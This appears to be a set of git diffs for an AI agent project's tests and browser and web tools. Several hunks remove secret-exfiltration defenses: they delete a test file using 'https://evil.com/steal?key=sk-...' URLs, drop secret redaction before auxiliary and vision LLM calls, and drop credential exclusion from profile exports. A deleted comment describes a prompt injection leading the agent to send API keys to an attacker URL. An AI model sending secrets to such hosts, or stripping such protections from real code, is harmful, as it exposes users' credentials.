@pytest.mark.asyncio
@pytest.mark.xfail(
reason="Bug: _handle_provider_command references unbound model_cfg when config.yaml is absent",
strict=False,
)
async def test_provider_shows_current_provider(self, adapter):
send = await send_and_capture(adapter, "/provider")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
assert "provider" in response_text.lower()
@pytest.mark.asyncio
async def test_verbose_responds(self, adapter):
send = await send_and_capture(adapter, "/verbose")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
# Either shows the mode cycle or tells user to enable it in config
assert "verbose" in response_text.lower() or "tool_progress" in response_text
@pytest.mark.asyncio
async def test_personality_lists_options(self, adapter):
send = await send_and_capture(adapter, "/personality")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
assert "personalit" in response_text.lower() # matches "personality" or "personalities"
@pytest.mark.asyncio
async def test_yolo_toggles_mode(self, adapter):
send = await send_and_capture(adapter, "/yolo")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
assert "yolo" in response_text.lower()
class TestSessionLifecycle:
"""Verify session state changes across command sequences."""
@pytest.mark.asyncio
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry):
"""After /new, /status should report the fresh session."""
await send_and_capture(adapter, "/new")
runner.session_store.reset_session.assert_called_once()
send = await send_and_capture(adapter, "/status")
send.assert_called_once()
response_text = send.call_args[1].get("content") or send.call_args[0][1]
# Session ID from the entry should appear in the status output
assert session_entry.session_id[:8] in response_text
@pytest.mark.asyncio
async def test_new_is_idempotent(self, adapter, runner):
"""/new called twice should not crash."""
await send_and_capture(adapter, "/new")
await send_and_capture(adapter, "/new")
assert runner.session_store.reset_session.call_count == 2
class TestAuthorization:
"""Verify the pipeline handles unauthorized users."""
@pytest.mark.asyncio
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner):
"""Unauthorized DM should trigger pairing code, not a command response."""
runner._is_user_authorized = lambda _source: False
event = make_event("/help")
adapter.send.reset_mock()
await adapter.handle_message(event)
await asyncio.sleep(0.3)
# The adapter.send is called directly by the authorization path
# (not via _send_with_retry), so check it was called with a pairing message
adapter.send.assert_called()
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
assert "recognize" in response_text.lower() or "pair" in response_text.lower() or "ABC123" in response_text
@pytest.mark.asyncio
async def test_unauthorized_user_does_not_get_help(self, adapter, runner):
"""Unauthorized user should NOT see the help command output."""
runner._is_user_authorized = lambda _source: False
event = make_event("/help")
adapter.send.reset_mock()
await adapter.handle_message(event)
await asyncio.sleep(0.3)
# If send was called, it should NOT contain the help text
if adapter.send.called:
response_text = adapter.send.call_args[0][1] if len(adapter.send.call_args[0]) > 1 else ""
assert "/new" not in response_text
class TestSendFailureResilience:
"""Verify the pipeline handles send failures gracefully."""
@pytest.mark.asyncio
async def test_send_failure_does_not_crash_pipeline(self, adapter):
"""If send() returns failure, the pipeline should not raise."""
adapter.send = AsyncMock(return_value=SendResult(success=False, error="network timeout"))
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
event = make_event("/help")
# Should not raise — pipeline handles send failures internally
await adapter.handle_message(event)
await asyncio.sleep(0.3)
adapter.send.assert_called()

View File

@@ -1576,110 +1576,3 @@ class TestConversationParameter:
assert resp.status == 200
# Conversation mapping should NOT be set since store=false
assert adapter._response_store.get_conversation("ephemeral-chat") is None
# ---------------------------------------------------------------------------
# X-Hermes-Session-Id header (session continuity)
# ---------------------------------------------------------------------------
class TestSessionIdHeader:
@pytest.mark.asyncio
async def test_new_session_response_includes_session_id_header(self, adapter):
"""Without X-Hermes-Session-Id, a new session is created and returned in the header."""
mock_result = {"final_response": "Hello!", "messages": [], "api_calls": 1}
app = _create_app(adapter)
async with TestClient(TestServer(app)) as cli:
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
resp = await cli.post(
"/v1/chat/completions",
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
)
assert resp.status == 200
assert resp.headers.get("X-Hermes-Session-Id") is not None
@pytest.mark.asyncio
async def test_provided_session_id_is_used_and_echoed(self, adapter):
"""When X-Hermes-Session-Id is provided, it's passed to the agent and echoed in the response."""
mock_result = {"final_response": "Continuing!", "messages": [], "api_calls": 1}
mock_db = MagicMock()
mock_db.get_messages_as_conversation.return_value = [
{"role": "user", "content": "previous message"},
{"role": "assistant", "content": "previous reply"},
]
adapter._session_db = mock_db
app = _create_app(adapter)
async with TestClient(TestServer(app)) as cli:
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
resp = await cli.post(
"/v1/chat/completions",
headers={"X-Hermes-Session-Id": "my-session-123"},
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Continue"}]},
)
assert resp.status == 200
assert resp.headers.get("X-Hermes-Session-Id") == "my-session-123"
call_kwargs = mock_run.call_args.kwargs
assert call_kwargs["session_id"] == "my-session-123"
@pytest.mark.asyncio
async def test_provided_session_id_loads_history_from_db(self, adapter):
"""When X-Hermes-Session-Id is provided, history comes from SessionDB not request body."""
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
db_history = [
{"role": "user", "content": "stored message 1"},
{"role": "assistant", "content": "stored reply 1"},
]
mock_db = MagicMock()
mock_db.get_messages_as_conversation.return_value = db_history
adapter._session_db = mock_db
app = _create_app(adapter)
async with TestClient(TestServer(app)) as cli:
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run:
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
resp = await cli.post(
"/v1/chat/completions",
headers={"X-Hermes-Session-Id": "existing-session"},
# Request body has different history — should be ignored
json={
"model": "hermes-agent",
"messages": [
{"role": "user", "content": "old msg from client"},
{"role": "assistant", "content": "old reply from client"},
{"role": "user", "content": "new question"},
],
},
)
assert resp.status == 200
call_kwargs = mock_run.call_args.kwargs
# History must come from DB, not from the request body
assert call_kwargs["conversation_history"] == db_history
assert call_kwargs["user_message"] == "new question"
@pytest.mark.asyncio
async def test_db_failure_falls_back_to_empty_history(self, adapter):
"""If SessionDB raises, history falls back to empty and request still succeeds."""
mock_result = {"final_response": "OK", "messages": [], "api_calls": 1}
# Simulate DB failure: _session_db is None and SessionDB() constructor raises
adapter._session_db = None
app = _create_app(adapter)
async with TestClient(TestServer(app)) as cli:
with patch.object(adapter, "_run_agent", new_callable=AsyncMock) as mock_run, \
patch("hermes_state.SessionDB", side_effect=Exception("DB unavailable")):
mock_run.return_value = (mock_result, {"input_tokens": 0, "output_tokens": 0, "total_tokens": 0})
resp = await cli.post(
"/v1/chat/completions",
headers={"X-Hermes-Session-Id": "some-session"},
json={"model": "hermes-agent", "messages": [{"role": "user", "content": "Hi"}]},
)
assert resp.status == 200
call_kwargs = mock_run.call_args.kwargs
assert call_kwargs["conversation_history"] == []
assert call_kwargs["session_id"] == "some-session"

View File

@@ -3,7 +3,7 @@
Verifies that:
1. _is_session_expired() works from a SessionEntry alone (no source needed)
2. The sync callback is no longer called in get_or_create_session
3. memory_flushed flag persists across save/load cycles (prevents restart re-flush)
3. _pre_flushed_sessions tracking works correctly
4. The background watcher can detect expired sessions
"""
@@ -115,8 +115,8 @@ class TestIsSessionExpired:
class TestGetOrCreateSessionNoCallback:
"""get_or_create_session should NOT call a sync flush callback."""
def test_auto_reset_creates_new_session_after_flush(self, idle_store):
"""When a flushed session auto-resets, a new session_id is created."""
def test_auto_reset_cleans_pre_flushed_marker(self, idle_store):
"""When a session auto-resets, the pre_flushed marker should be discarded."""
source = SessionSource(
platform=Platform.TELEGRAM,
chat_id="123",
@@ -127,7 +127,7 @@ class TestGetOrCreateSessionNoCallback:
old_sid = entry1.session_id
# Simulate the watcher having flushed it
entry1.memory_flushed = True
idle_store._pre_flushed_sessions.add(old_sid)
# Simulate the session going idle
entry1.updated_at = datetime.now() - timedelta(minutes=120)
@@ -137,8 +137,9 @@ class TestGetOrCreateSessionNoCallback:
entry2 = idle_store.get_or_create_session(source)
assert entry2.session_id != old_sid
assert entry2.was_auto_reset is True
# New session starts with memory_flushed=False
assert entry2.memory_flushed is False
# The old session_id should be removed from pre_flushed
assert old_sid not in idle_store._pre_flushed_sessions
def test_no_sync_callback_invoked(self, idle_store):
"""No synchronous callback should block during auto-reset."""
@@ -159,91 +160,21 @@ class TestGetOrCreateSessionNoCallback:
assert entry2.was_auto_reset is True
class TestMemoryFlushedFlag:
"""The memory_flushed flag on SessionEntry prevents double-flushing."""
class TestPreFlushedSessionsTracking:
"""The _pre_flushed_sessions set should prevent double-flushing."""
def test_defaults_to_false(self):
entry = SessionEntry(
session_key="agent:main:telegram:dm:123",
session_id="sid_new",
created_at=datetime.now(),
updated_at=datetime.now(),
platform=Platform.TELEGRAM,
chat_type="dm",
)
assert entry.memory_flushed is False
def test_starts_empty(self, idle_store):
assert len(idle_store._pre_flushed_sessions) == 0
def test_persists_through_save_load(self, idle_store):
"""memory_flushed=True must survive a save/load cycle (simulates restart)."""
key = "agent:main:discord:thread:789"
entry = SessionEntry(
session_key=key,
session_id="sid_flushed",
created_at=datetime.now() - timedelta(hours=5),
updated_at=datetime.now() - timedelta(hours=5),
platform=Platform.DISCORD,
chat_type="thread",
memory_flushed=True,
)
idle_store._entries[key] = entry
idle_store._save()
def test_add_and_check(self, idle_store):
idle_store._pre_flushed_sessions.add("sid_old")
assert "sid_old" in idle_store._pre_flushed_sessions
assert "sid_other" not in idle_store._pre_flushed_sessions
# Simulate restart: clear in-memory state, reload from disk
idle_store._entries.clear()
idle_store._loaded = False
idle_store._ensure_loaded()
reloaded = idle_store._entries[key]
assert reloaded.memory_flushed is True
def test_unflushed_entry_survives_restart_as_unflushed(self, idle_store):
"""An entry without memory_flushed stays False after reload."""
key = "agent:main:telegram:dm:456"
entry = SessionEntry(
session_key=key,
session_id="sid_not_flushed",
created_at=datetime.now() - timedelta(hours=2),
updated_at=datetime.now() - timedelta(hours=2),
platform=Platform.TELEGRAM,
chat_type="dm",
)
idle_store._entries[key] = entry
idle_store._save()
idle_store._entries.clear()
idle_store._loaded = False
idle_store._ensure_loaded()
reloaded = idle_store._entries[key]
assert reloaded.memory_flushed is False
def test_roundtrip_to_dict_from_dict(self):
"""to_dict/from_dict must preserve memory_flushed."""
entry = SessionEntry(
session_key="agent:main:telegram:dm:999",
session_id="sid_rt",
created_at=datetime.now(),
updated_at=datetime.now(),
platform=Platform.TELEGRAM,
chat_type="dm",
memory_flushed=True,
)
d = entry.to_dict()
assert d["memory_flushed"] is True
restored = SessionEntry.from_dict(d)
assert restored.memory_flushed is True
def test_legacy_entry_without_field_defaults_false(self):
"""Old sessions.json entries missing memory_flushed should default to False."""
data = {
"session_key": "agent:main:telegram:dm:legacy",
"session_id": "sid_legacy",
"created_at": datetime.now().isoformat(),
"updated_at": datetime.now().isoformat(),
"platform": "telegram",
"chat_type": "dm",
# no memory_flushed key
}
entry = SessionEntry.from_dict(data)
assert entry.memory_flushed is False
def test_discard_on_reset(self, idle_store):
"""discard should remove without raising if not present."""
idle_store._pre_flushed_sessions.add("sid_a")
idle_store._pre_flushed_sessions.discard("sid_a")
assert "sid_a" not in idle_store._pre_flushed_sessions
# discard on non-existent should not raise
idle_store._pre_flushed_sessions.discard("sid_nonexistent")

View File

@@ -271,7 +271,7 @@ class TestGatewaySystemServiceRouting:
)
run_calls = []
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=0, quiet=False, replace=False: run_calls.append((verbose, quiet, replace)))
monkeypatch.setattr(gateway_cli, "run_gateway", lambda verbose=False, replace=False: run_calls.append((verbose, replace)))
monkeypatch.setattr(gateway_cli, "kill_gateway_processes", lambda force=False: 0)
try:

View File

@@ -1,52 +0,0 @@
"""Tests for credential exclusion during profile export.
Profile exports should NEVER include auth.json or .env — these contain
API keys, OAuth tokens, and credential pool data. Users share exported
profiles; leaking credentials in the archive is a security issue.
"""
import tarfile
from pathlib import Path
from hermes_cli.profiles import export_profile, _DEFAULT_EXPORT_EXCLUDE_ROOT
class TestCredentialExclusion:
def test_auth_json_in_default_exclude_set(self):
"""auth.json must be in the default export exclusion set."""
assert "auth.json" in _DEFAULT_EXPORT_EXCLUDE_ROOT
def test_dotenv_in_default_exclude_set(self):
""".env must be in the default export exclusion set."""
assert ".env" in _DEFAULT_EXPORT_EXCLUDE_ROOT
def test_named_profile_export_excludes_auth(self, tmp_path, monkeypatch):
"""Named profile export must not contain auth.json or .env."""
profiles_root = tmp_path / "profiles"
profile_dir = profiles_root / "testprofile"
profile_dir.mkdir(parents=True)
# Create a profile with credentials
(profile_dir / "config.yaml").write_text("model: gpt-4\n")
(profile_dir / "auth.json").write_text('{"tokens": {"access": "sk-secret"}}')
(profile_dir / ".env").write_text("OPENROUTER_API_KEY=sk-secret-key\n")
(profile_dir / "SOUL.md").write_text("I am helpful.\n")
(profile_dir / "memories").mkdir()
(profile_dir / "memories" / "MEMORY.md").write_text("# Memories\n")
monkeypatch.setattr("hermes_cli.profiles._get_profiles_root", lambda: profiles_root)
monkeypatch.setattr("hermes_cli.profiles.get_profile_dir", lambda n: profile_dir)
monkeypatch.setattr("hermes_cli.profiles.validate_profile_name", lambda n: None)
output = tmp_path / "export.tar.gz"
result = export_profile("testprofile", str(output))
# Check archive contents
with tarfile.open(result, "r:gz") as tf:
names = tf.getnames()
assert any("config.yaml" in n for n in names), "config.yaml should be in export"
assert any("SOUL.md" in n for n in names), "SOUL.md should be in export"
assert not any("auth.json" in n for n in names), "auth.json must NOT be in export"
assert not any(".env" in n for n in names), ".env must NOT be in export"

View File

@@ -505,7 +505,7 @@ class TestExportImport:
assert tarfile.is_tarfile(str(result))
def test_export_default_includes_profile_data(self, profile_env, tmp_path):
"""Profile data files end up in the archive (credentials excluded)."""
"""Profile data files end up in the archive."""
default_dir = get_profile_dir("default")
(default_dir / "config.yaml").write_text("model: test")
(default_dir / ".env").write_text("KEY=val")
@@ -522,7 +522,7 @@ class TestExportImport:
names = tf.getnames()
assert "default/config.yaml" in names
assert "default/.env" not in names # credentials excluded
assert "default/.env" in names
assert "default/SOUL.md" in names
assert "default/memories/MEMORY.md" in names

View File

@@ -704,14 +704,14 @@ class TestHasAnyProviderConfigured:
assert _has_any_provider_configured() is True
def test_config_dict_no_provider_no_creds_still_false(self, monkeypatch, tmp_path):
"""config.yaml model dict with empty default and no creds stays false."""
"""config.yaml model dict with only 'default' key and no creds stays false."""
import yaml
from hermes_cli import config as config_module
hermes_home = tmp_path / ".hermes"
hermes_home.mkdir()
config_file = hermes_home / "config.yaml"
config_file.write_text(yaml.dump({
"model": {"default": ""},
"model": {"default": "anthropic/claude-opus-4.6"},
}))
monkeypatch.setattr(config_module, "get_env_path", lambda: hermes_home / ".env")
monkeypatch.setattr(config_module, "get_hermes_home", lambda: hermes_home)

View File

@@ -187,12 +187,12 @@ class TestNormalizeModelForProvider:
assert cli.model == "claude-opus-4.6"
def test_default_model_replaced(self):
"""No model configured (empty default) gets swapped for codex."""
"""The untouched default (anthropic/claude-opus-4.6) gets swapped."""
import cli as _cli_mod
_clean_config = {
"model": {
"default": "",
"base_url": "",
"default": "anthropic/claude-opus-4.6",
"base_url": "https://openrouter.ai/api/v1",
"provider": "auto",
},
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},
@@ -219,12 +219,12 @@ class TestNormalizeModelForProvider:
assert cli.model == "gpt-5.3-codex"
def test_default_fallback_when_api_fails(self):
"""No model configured falls back to gpt-5.3-codex when API unreachable."""
"""Default model falls back to gpt-5.3-codex when API unreachable."""
import cli as _cli_mod
_clean_config = {
"model": {
"default": "",
"base_url": "",
"default": "anthropic/claude-opus-4.6",
"base_url": "https://openrouter.ai/api/v1",
"provider": "auto",
},
"display": {"compact": False, "tool_progress": "all", "resume_display": "full"},

View File

@@ -137,76 +137,6 @@ class TestBuildApiKwargsOpenRouter:
assert "codex_reasoning_items" in messages[1]
class TestDeveloperRoleSwap:
"""GPT-5 and Codex models should get 'developer' instead of 'system' role."""
@pytest.mark.parametrize("model", [
"openai/gpt-5",
"openai/gpt-5-turbo",
"openai/gpt-5.4",
"gpt-5-mini",
"openai/codex-mini",
"codex-mini-latest",
"openai/codex-pro",
])
def test_gpt5_codex_get_developer_role(self, monkeypatch, model):
agent = _make_agent(monkeypatch, "openrouter")
agent.model = model
messages = [
{"role": "system", "content": "You are helpful."},
{"role": "user", "content": "hi"},
]
kwargs = agent._build_api_kwargs(messages)
assert kwargs["messages"][0]["role"] == "developer"
assert kwargs["messages"][0]["content"] == "You are helpful."
assert kwargs["messages"][1]["role"] == "user"
@pytest.mark.parametrize("model", [
"anthropic/claude-opus-4.6",
"openai/gpt-4o",
"google/gemini-2.5-pro",
"deepseek/deepseek-chat",
"openai/o3-mini",
])
def test_non_matching_models_keep_system_role(self, monkeypatch, model):
agent = _make_agent(monkeypatch, "openrouter")
agent.model = model
messages = [
{"role": "system", "content": "You are helpful."},
{"role": "user", "content": "hi"},
]
kwargs = agent._build_api_kwargs(messages)
assert kwargs["messages"][0]["role"] == "system"
def test_no_system_message_no_crash(self, monkeypatch):
agent = _make_agent(monkeypatch, "openrouter")
agent.model = "openai/gpt-5"
messages = [{"role": "user", "content": "hi"}]
kwargs = agent._build_api_kwargs(messages)
assert kwargs["messages"][0]["role"] == "user"
def test_original_messages_not_mutated(self, monkeypatch):
agent = _make_agent(monkeypatch, "openrouter")
agent.model = "openai/gpt-5"
messages = [
{"role": "system", "content": "You are helpful."},
{"role": "user", "content": "hi"},
]
agent._build_api_kwargs(messages)
# Original messages must be untouched (internal representation stays "system")
assert messages[0]["role"] == "system"
def test_developer_role_via_nous_portal(self, monkeypatch):
agent = _make_agent(monkeypatch, "nous", base_url="https://inference-api.nousresearch.com/v1")
agent.model = "gpt-5"
messages = [
{"role": "system", "content": "You are helpful."},
{"role": "user", "content": "hi"},
]
kwargs = agent._build_api_kwargs(messages)
assert kwargs["messages"][0]["role"] == "developer"
class TestBuildApiKwargsAIGateway:
def test_uses_chat_completions_format(self, monkeypatch):
agent = _make_agent(monkeypatch, "ai-gateway", base_url="https://ai-gateway.vercel.sh/v1")

View File

@@ -1,186 +0,0 @@
"""Tests for secret exfiltration prevention in browser and web tools."""
import json
from unittest.mock import patch, MagicMock
import pytest
@pytest.fixture(autouse=True)
def _ensure_redaction_enabled(monkeypatch):
"""Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
class TestBrowserSecretExfil:
"""Verify browser_navigate blocks URLs containing secrets."""
def test_blocks_api_key_in_url(self):
from tools.browser_tool import browser_navigate
result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
parsed = json.loads(result)
assert parsed["success"] is False
assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
def test_blocks_openrouter_key_in_url(self):
from tools.browser_tool import browser_navigate
result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
parsed = json.loads(result)
assert parsed["success"] is False
def test_allows_normal_url(self):
"""Normal URLs pass the secret check (may fail for other reasons)."""
from tools.browser_tool import browser_navigate
result = browser_navigate("https://github.com/NousResearch/hermes-agent")
parsed = json.loads(result)
# Should NOT be blocked by secret detection
assert "API key or token" not in parsed.get("error", "")
class TestWebExtractSecretExfil:
"""Verify web_extract_tool blocks URLs containing secrets."""
@pytest.mark.asyncio
async def test_blocks_api_key_in_url(self):
from tools.web_tools import web_extract_tool
result = await web_extract_tool(
urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
)
parsed = json.loads(result)
assert parsed["success"] is False
assert "Blocked" in parsed["error"]
@pytest.mark.asyncio
async def test_allows_normal_url(self):
from tools.web_tools import web_extract_tool
# This will fail due to no API key, but should NOT be blocked by secret check
result = await web_extract_tool(urls=["https://example.com"])
parsed = json.loads(result)
# Should fail for API/config reason, not secret blocking
assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
class TestBrowserSnapshotRedaction:
"""Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
def test_extract_relevant_content_redacts_secrets(self):
"""Snapshot containing secrets should be redacted before call_llm."""
from tools.browser_tool import _extract_relevant_content
# Build a snapshot with a fake Anthropic-style key embedded
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
snapshot_with_secret = (
"heading: Dashboard Settings\n"
f"text: API Key: {fake_key}\n"
"button [ref=e5]: Save\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(snapshot_with_secret, "check settings")
assert len(captured_prompts) == 1
# The middle portion of the key must not appear in the prompt
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
# Non-secret content should survive
assert "Dashboard" in captured_prompts[0]
assert "ref=e5" in captured_prompts[0]
def test_extract_relevant_content_no_task_redacts_secrets(self):
"""Snapshot without user_task should also redact secrets."""
from tools.browser_tool import _extract_relevant_content
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
snapshot_with_secret = (
f"text: OPENAI_API_KEY={fake_key}\n"
"link [ref=e2]: Home\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(snapshot_with_secret)
assert len(captured_prompts) == 1
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
def test_extract_relevant_content_normal_snapshot_unchanged(self):
"""Snapshot without secrets should pass through normally."""
from tools.browser_tool import _extract_relevant_content
normal_snapshot = (
"heading: Welcome\n"
"text: Click the button below to continue\n"
"button [ref=e1]: Continue\n"
)
captured_prompts = []
def mock_call_llm(**kwargs):
prompt = kwargs["messages"][0]["content"]
captured_prompts.append(prompt)
mock_resp = MagicMock()
mock_resp.choices = [MagicMock()]
mock_resp.choices[0].message.content = "Welcome page with continue button"
return mock_resp
with patch("tools.browser_tool.call_llm", mock_call_llm):
_extract_relevant_content(normal_snapshot, "proceed")
assert len(captured_prompts) == 1
assert "Welcome" in captured_prompts[0]
assert "Continue" in captured_prompts[0]
class TestCamofoxAnnotationRedaction:
"""Verify annotation context is redacted before vision LLM call."""
def test_annotation_context_secrets_redacted(self):
"""Secrets in accessibility tree annotation should be masked."""
from agent.redact import redact_sensitive_text
fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
annotation = (
"\n\nAccessibility tree (element refs for interaction):\n"
f"text: Token: {fake_token}\n"
"button [ref=e3]: Copy\n"
)
result = redact_sensitive_text(annotation)
assert "FAKEGITHUBTOKEN123456789" not in result
# Non-secret parts preserved
assert "button" in result
assert "ref=e3" in result
def test_annotation_env_dump_redacted(self):
"""Env var dump in annotation context should be redacted."""
from agent.redact import redact_sensitive_text
fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
annotation = (
"\n\nAccessibility tree (element refs for interaction):\n"
f"text: ANTHROPIC_API_KEY={fake_anth}\n"
f"text: OPENAI_API_KEY={fake_oai}\n"
"text: PATH=/usr/local/bin\n"
)
result = redact_sensitive_text(annotation)
assert "ANTHROPICFAKEKEY123456789" not in result
assert "OPENAIFAKEKEY99887766" not in result
assert "PATH=/usr/local/bin" in result

View File

@@ -485,12 +485,6 @@ def camofox_vision(question: str, annotate: bool = False,
except Exception:
pass
# Redact secrets from annotation context before sending to vision LLM.
# The screenshot image itself cannot be redacted, but at least the
# text-based accessibility tree snippet won't leak secret values.
from agent.redact import redact_sensitive_text
annotation_context = redact_sensitive_text(annotation_context)
# Send to vision LLM
from agent.auxiliary_client import call_llm
@@ -522,11 +516,7 @@ def camofox_vision(question: str, annotate: bool = False,
task="vision",
timeout=_vision_timeout,
)
analysis = (response.choices[0].message.content or "").strip() if response.choices else ""
# Redact secrets the vision LLM may have read from the screenshot.
from agent.redact import redact_sensitive_text
analysis = redact_sensitive_text(analysis)
analysis = response.choices[0].message.content if response.choices else ""
return json.dumps({
"success": True,

View File

@@ -1030,13 +1030,6 @@ def _extract_relevant_content(
f"Provide a concise summary focused on interactive elements and key content."
)
# Redact secrets from snapshot before sending to auxiliary LLM.
# Without this, a page displaying env vars or API keys would leak
# secrets to the extraction model before run_agent.py's general
# redaction layer ever sees the tool result.
from agent.redact import redact_sensitive_text
extraction_prompt = redact_sensitive_text(extraction_prompt)
try:
call_kwargs = {
"task": "web_extract",
@@ -1048,9 +1041,7 @@ def _extract_relevant_content(
if model:
call_kwargs["model"] = model
response = call_llm(**call_kwargs)
extracted = (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
# Redact any secrets the auxiliary LLM may have echoed back.
return redact_sensitive_text(extracted)
return (response.choices[0].message.content or "").strip() or _truncate_snapshot(snapshot_text)
except Exception:
return _truncate_snapshot(snapshot_text)
@@ -1087,17 +1078,6 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
Returns:
JSON string with navigation result (includes stealth features info on first nav)
"""
# Secret exfiltration protection — block URLs that embed API keys or
# tokens in query parameters. A prompt injection could trick the agent
# into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
from agent.redact import _PREFIX_RE
if _PREFIX_RE.search(url):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
"Secrets must not be sent in URLs.",
})
# SSRF protection — block private/internal addresses before navigating.
# Skipped for local backends (Camofox, headless Chromium without a cloud
# provider) because the agent already has full local network access via
@@ -1742,9 +1722,6 @@ def browser_vision(question: str, annotate: bool = False, task_id: Optional[str]
response = call_llm(**call_kwargs)
analysis = (response.choices[0].message.content or "").strip()
# Redact secrets the vision LLM may have read from the screenshot.
from agent.redact import redact_sensitive_text
analysis = redact_sensitive_text(analysis)
response_data = {
"success": True,
"analysis": analysis or "Vision analysis returned no content.",

View File

@@ -925,26 +925,24 @@ def web_search_tool(query: str, limit: int = 5) -> str:
async def web_extract_tool(
urls: List[str],
format: str = None,
urls: List[str],
format: str = None,
use_llm_processing: bool = True,
model: str = DEFAULT_SUMMARIZER_MODEL,
min_length: int = DEFAULT_MIN_LENGTH_FOR_SUMMARIZATION
) -> str:
"""
Extract content from specific web pages using available extraction API backend.
This function provides a generic interface for web content extraction that
can work with multiple backends. Currently uses Firecrawl.
Args:
urls (List[str]): List of URLs to extract content from
format (str): Desired output format ("markdown" or "html", optional)
use_llm_processing (bool): Whether to process content with LLM for summarization (default: True)
model (str): The model to use for LLM processing (default: google/gemini-3-flash-preview)
min_length (int): Minimum content length to trigger LLM processing (default: 5000)
Security: URLs are checked for embedded secrets before fetching.
Returns:
str: JSON string containing extracted content. If LLM processing is enabled and successful,
@@ -953,16 +951,6 @@ async def web_extract_tool(
Raises:
Exception: If extraction fails or API key is not set
"""
# Block URLs containing embedded secrets (exfiltration prevention)
from agent.redact import _PREFIX_RE
for _url in urls:
if _PREFIX_RE.search(_url):
return json.dumps({
"success": False,
"error": "Blocked: URL contains what appears to be an API key or token. "
"Secrets must not be sent in URLs.",
})
debug_call_data = {
"parameters": {
"urls": urls,